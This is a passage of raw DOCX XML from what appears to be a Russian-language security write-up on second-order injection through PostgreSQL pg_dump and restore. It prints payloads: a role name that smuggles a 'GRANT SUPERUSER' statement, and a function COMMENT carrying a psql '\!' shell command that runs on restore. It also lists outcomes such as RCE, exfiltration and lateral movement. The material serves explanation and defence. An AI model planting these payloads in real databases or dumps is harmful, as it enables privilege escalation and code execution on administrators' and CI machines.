        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBD811E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "innocent_role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — начало CREATE; quoted-identifier открывается на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170F14FF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>внутри quoted-identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\nGRANT SUPERUSER TO innocent_role;\n--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — quoted-identifier-парсер ждёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не реагирует на newline или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Всё это часть имени role.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закрывающая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t>, который часть имени).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A53DD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. PG cоздаёт role с именем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"innocent_role\nGRANT SUPERUSER TO innocent_role;\n--"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (включая newline и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Не injection через CREATE; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>имя role на 70+ байт</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3642850D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Где injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F707AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий должен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разорвать</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoted-identifier раньше. Newline сам по себе не разрывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> явный. Это требует более сложного payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEE94C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "innocent""\nGRANT SUPERUSER TO some_user;--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD4ADD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape для одиночной </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Внутри имени получается </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>innocent"\nGRANT SUPERUSER TO some_user;--</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BDD435" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>При сериализации pg_dump:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182B983" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE ROLE "innocent""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13C2A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GRANT SUPERUSER TO some_user;--" LOGIN;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741EBE5B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пишет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для escape; ломанная форма зависит от реализации dump.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A798C6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">При парсинге restore — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — открывает новую quoted-region. Точный сценарий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>зависит от bug-class CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и публичный PoC R25 — на GitHub-issue PG; полный детальный walkthrough — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (август 2025).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040C92F5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сводка: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R25 показал, что fix CVE-2012-0868 был частичный</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — некоторые формы Unicode/escape/format-string-comments позволяли injection в restore-context, даже если application-уровневый pg_dump quoted-identifier корректно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716E6950" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — RCE через plpgsql-function body</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB17A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Атакующий создаёт plpgsql-функцию с newline-в-теле, который при сериализации </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уходит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>за</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dollar-quoted-границу или в SQL-комментарий dump-блока:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11562ED1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION public.innocent_func() RETURNS void</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324ECBAA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E7F407" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44897E05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RAISE NOTICE 'normal';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B4589C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B84DDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FCE0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E0E6D2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COMMENT ON FUNCTION public.innocent_func() IS 'Innocent function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1903EA2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B5255" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD25121" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сериализует COMMENT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7F5F6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COMMENT ON FUNCTION public.innocent_func() IS 'Innocent function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C4C3C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id &gt; /tmp/pwn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8574C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>--';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DD23F2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoting-функция должна экранировать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'...'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. До CVE-2025-8715 fix, escape был неполным для некоторых encoded-форм; payload в COMMENT-тексте разрывал dump-script. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Детальный mechanism — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B8E34A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что произойдёт</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F468B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE на host, где запущен psql (DBA-машина, CI-runner) через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> meta-command. Может быть exfiltration, persistence, lateral movement в инфраструктуре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09615434" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SQL injection при restore — атакующий выполняет SUPERUSER-GRANT, CREATE EXTENSION, и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7F2B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — RCE через COMMENT-payload, активируется при restore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E56DCD9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Все три варианта — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>second-order injection</w:t>
      </w:r>
      <w:r>
        <w:t>: setup в одном месте/времени, активация в другом. Это критическое отличие от обычной SQLi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45635B9B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Почему этот приём проходит фильтр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBE1CEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CREATE-time validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не валидирует имена объектов перед dump-ом (cчитает их already-validated на CREATE-стадии).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68A537" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CREATE-time валидация в PG core</w:t>
      </w:r>
      <w:r>
